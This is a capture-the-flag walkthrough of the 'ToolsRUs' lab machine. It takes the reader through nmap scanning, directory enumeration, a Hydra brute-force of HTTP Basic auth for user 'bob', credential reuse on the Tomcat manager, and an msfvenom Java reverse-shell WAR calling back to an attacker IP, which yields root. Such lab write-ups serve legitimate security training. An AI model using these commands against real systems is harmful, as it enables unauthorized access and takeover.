ToolsRUs
Description
Practise using tools such as dirbuster, hydra, nmap, nikto and metasploit
In this section, I will discuss about gaining access to a system by exploiting vulnerabilities in various services. The services include Apache Tomcat, Apache Coyote JSP Engine, Apache Jserv, and an HTTP server on port 80.
Scanning¶
-
Assigned IP address: 10.10.4.144
-
Open Ports:
PORT |
SERVICE |
DESCRIPTION |
|---|---|---|
22/TCP |
SSH |
OpenSSH 7.2p2 Ubuntu |
80/TCP |
HTTP |
Apache httpd 2.4.18 |
1234/TCP |
HTTP |
Apache Tomcat/Coyote JSP engine 1.1 |
8009/TCP |
AJP13 |
Apache Jserv (Protocol v1.3) |
- Nmap Report:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
# Nmap 7.93 scan initiated Wed Feb 22 10:11:28 2023 as: nmap -sC -sV -O -oN nmap.txt 10.10.4.144 Nmap scan report for 10.10.4.144 Host is up (0.15s latency). Not shown: 996 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 460e76fbb6a2f7f78536656f8809f7e8 (RSA) | 256 a1bc5d3478f4e8d4091805ef9d9072c5 (ECDSA) |_ 256 0757145539dfc56296f9fc4883cf127e (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 1234/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-title: Apache Tomcat/7.0.88 |_http-server-header: Apache-Coyote/1.1 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) |_ajp-methods: Failed to get a valid response for the OPTION request No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.93%E=4%D=2/22%OT=22%CT=1%CU=33697%PV=Y%DS=5%DC=I%G=Y%TM=63F630B OS:F%P=aarch64-unknown-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS OS:=8)OPS(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M OS:505ST11NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68 OS:DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A= OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q OS:=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A OS:%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y OS:%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T OS:=40%CD=S) Network Distance: 5 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Feb 22 10:11:59 2023 -- 1 IP address (1 host up) scanned in 30.78 seconds
Enumerating Apache Coyote JSP Engine¶
At first, my plan was to exploit the Apache JSP Engine by uploading a malicious WAR file to obtain a shell. Since I was familiar with this method, I felt confident. However, I was unable to pass the authorization process.
In my attempts to gain access to the Tomcat Manager, I initially turned to a Python script to brute force default logins for Apache Tomcat. Unfortunately, this approach also failed.
Enumerating the HTTP Server¶
I then shifted my focus to the HTTP server running on port 80, where I discovered a simple page that hinted at the development of the site.
Utilizing a dirsearch Python script, I was able to locate potentially hidden pages and directories that could provide further clues and entry points.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 | |
Exploiting '/guidelines' page¶
After running the dirsearch script, I was able to identify two promising directories that could lead to further leads, namely protected and guidelines. The former sounded highly secured, but to my surprise, it was not. While I was filling out the question, I decided to check out the /guidelines page, and found a username called bob.
Leveraging this discovery, I was able to brute force Bob's password using Hydra, which gave me access to the protected directory. It was a simple HTTP Basic Authorization Request which can be brute forced with the following command:
Hydra Command
hydra $IP -l bob -P ~/rockyou.txt http-get /protected -V
I successfully obtained Bob's login credentials, and used them to access the page that I had discovered earlier.
Exploiting Apache Tomcat with Harvested Credentials¶
When I logged in, I discovered that the Authorization mechanism used for the Tomcat Service and the /protected directory were the same.
This allowed me to reuse the credentials that I had previously harvested. With access granted, I uploaded a Java WAR file to the manager and made a reverse shell from it.
Msfvenom Payload
msfvenom -p java/shell_reverse_tcp lhost=10.17.3.217 lport=5432 -f war -o shell.war
Also, I made a listener, before I accessed http://10.10.4.144:1234/shell/ giving me the shell.
Gaining root access¶
Surprisingly, I was granted root access, rather than the expected www-data shell. Easy-Peasy
root@ip-10-10-4-144:/# cat root/*
cat root/*
[REDACTED]
cat: root/snap: Is a directory
Peace-out!